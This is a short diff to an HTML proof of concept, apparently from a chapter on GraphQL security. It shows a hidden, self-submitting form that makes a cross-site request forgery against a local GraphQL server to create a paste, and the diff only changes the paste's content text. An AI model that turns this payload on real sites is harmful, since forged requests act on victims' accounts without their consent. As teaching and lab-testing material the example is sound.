--- a/ch09/post_csrf_submit_auto.html
+++ b/ch09/post_csrf_submit_auto.html
@@ -3,7 +3,7 @@
   <body>
     <h1>This form is going to submit itself in 2 seconds...</h1>
      <form id="auto_submit_form" method="POST" action="http://localhost:5013/graphql">
-       <input type="hidden" name="query" value="mutation { createPaste(title:&quot;CSRF&quot;, content:&quot;content&quot;, public:true, burn: false) { paste { id content title burn } }}"/>
+       <input type="hidden" name="query" value="mutation { createPaste(title:&quot;CSRF&quot;, content:&quot;The PoC worked!&quot;, public:true, burn: false) { paste { id content title burn } }}"/>
        <input type="submit" value="Submit">
      </form>
   </body>
